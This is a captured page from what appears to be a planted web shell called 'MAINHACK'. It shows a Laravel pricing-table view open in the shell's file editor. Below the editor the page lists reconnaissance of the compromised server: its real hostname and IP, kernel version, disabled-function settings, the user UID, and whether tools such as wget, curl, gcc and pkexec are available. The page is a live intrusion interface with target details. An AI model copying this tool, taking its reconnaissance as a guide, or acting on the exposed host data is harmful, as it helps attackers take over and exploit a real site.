[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: e597e5f291e3836887e709036604371a.php
<?php $__env->startSection('content'); ?> <div id="pricing-table"> <div class="row gx-5 justify-content-center"> <div class="col-lg-12 d-flex justify-content-center"> <div class="form-check form-switch custom-switch mb-5 me-3"> <input class="form-check-input plan_type" type="radio" value="monthly" name="plan_type" id="monthy-plans" checked> <label class="form-check-label ms-1 text-primary" for="monthy-plans"><b><?php echo e(_lang('Monthly')); ?></b></label> </div> <div class="form-check form-switch custom-switch mb-5 me-3"> <input class="form-check-input plan_type" type="radio" value="yearly" name="plan_type" id="yearly-plans"> <label class="form-check-label ms-1 text-primary" for="yearly-plans"><b><?php echo e(_lang('Yearly')); ?></b></label> </div> <div class="form-check form-switch custom-switch mb-5"> <input class="form-check-input plan_type" type="radio" value="lifetime" name="plan_type" id="lifetime-plans"> <label class="form-check-label ms-1 text-primary" for="lifetime-plans"><b><?php echo e(_lang('Lifetime')); ?></b></label> </div> </div> <?php $__currentLoopData = $packages; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $package): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-lg-4 mb-5 <?php echo e($package->package_type); ?>-plan"> <div class="pricing-plan popular h-100 <?php echo e($package->package_type == 'monthly' ? 'wow' : ''); ?> animate__zoomIn" data-wow-delay=".6s"> <div class="pricing-plan-header"> <?php if($package->is_popular == 1): ?> <span><?php echo e(_lang('Most popular')); ?></span> <?php endif; ?> <h5><?php echo e($package->name); ?></h5> <?php if($package->discount > 0): ?> <p class="d-inline-block mb-4"> <small><del><?php echo e(decimalPlace($package->cost, currency_symbol())); ?></del></small> <span class="bg-info d-inline-block text-white px-3 py-1 rounded-pill ms-1"><?php echo e($package->discount.'% '._lang('Discount')); ?></span> </p> <h4><span><?php echo e(decimalPlace($package->cost - ($package->discount / 100) * $package->cost, currency_symbol())); ?></span> / <?php echo e(ucwords($package->package_type)); ?></h4> <?php else: ?> <h4><span><?php echo e(decimalPlace($package->cost, currency_symbol())); ?></span> / <?php echo e(ucwords($package->package_type)); ?></h4> <?php endif; ?> <?php if($package->trial_days > 0): ?> <h6 class="mt-2 text-danger"><?php echo e($package->trial_days.' '._lang('Days Free Trial')); ?></h6> <?php else: ?> <h6 class="mt-2 text-dark"><?php echo e(_lang('No Trial Available')); ?></h6> <?php endif; ?> </div> <div class="pricing-plan-body"> <ul> <li><i class="fas fa-check-circle text-success mr-2"></i><?php echo e(str_replace('-1',_lang('Unlimited'), $package->business_limit).' '._lang('Business Account')); ?></li> <li><i class="fas fa-check-circle text-success mr-2"></i><?php echo e(str_replace('-1',_lang('Unlimited'), $package->user_limit).' '._lang('System User')); ?></li> <li><i class="fas fa-check-circle text-success mr-2"></i><?php echo e(str_replace('-1',_lang('Unlimited'), $package->invoice_limit).' '._lang('Invoice')); ?></li> <li><i class="fas fa-check-circle text-success mr-2"></i><?php echo e(str_replace('-1',_lang('Unlimited'), $package->quotation_limit).' '._lang('Quotation')); ?></li> <li><i class="<?php echo e($package->recurring_invoice == 0 ? 'fas fa-times-circle text-danger' : 'fas fa-check-circle text-success'); ?> mr-2"></i><?php echo e(_lang('Recurring Invoice')); ?></li> <li><i class="<?php echo e($package->payroll_module == 0 ? 'fas fa-times-circle text-danger' : 'fas fa-check-circle text-success'); ?> mr-2"></i><?php echo e(_lang('HR & Payroll Module')); ?></li> <li><i class="fas fa-check-circle text-success mr-2"></i><?php echo e(str_replace('-1',_lang('Unlimited'), $package->customer_limit).' '._lang('Customer Account')); ?></li> <li><i class="bi <?php echo e($package->invoice_builder == 0 ? 'fas fa-times-circle text-danger' : 'fas fa-check-circle text-success'); ?> mr-2"></i><?php echo e(_lang('Invoice Template Builder')); ?></li> <li><i class="bi <?php echo e($package->online_invoice_payment == 0 ? 'fas fa-times-circle text-danger' : 'fas fa-check-circle text-success'); ?> mr-2"></i><?php echo e(_lang('Accept Online Payment')); ?></li> </ul> <form action="<?php echo e(route('membership.choose_package')); ?>" method="post"> <?php echo csrf_field(); ?> <input type="hidden" name="package_id" value="<?php echo e($package->id); ?>"> <button type="submit" class="btn btn-primary btn-block mt-4"><?php echo e(_lang('Select Package')); ?></button> </form> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.guest', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/public_html/resources/views/backend/guest/membership/packages.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002